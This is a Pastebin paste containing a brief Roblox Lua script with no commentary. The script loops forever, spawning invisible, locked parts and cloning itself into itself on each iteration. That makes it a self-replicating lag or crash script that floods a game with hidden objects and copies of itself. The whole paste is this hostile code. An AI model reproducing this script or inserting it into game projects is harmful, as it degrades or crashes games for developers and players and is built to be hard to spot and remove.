Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- while true do
- wait()
- local L = Instance.new("Part",script)
- L.Transparency = 1
- L.Locked = true
- L.CanQuery = false
- local h = script:Clone()
- h.Parent = script
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement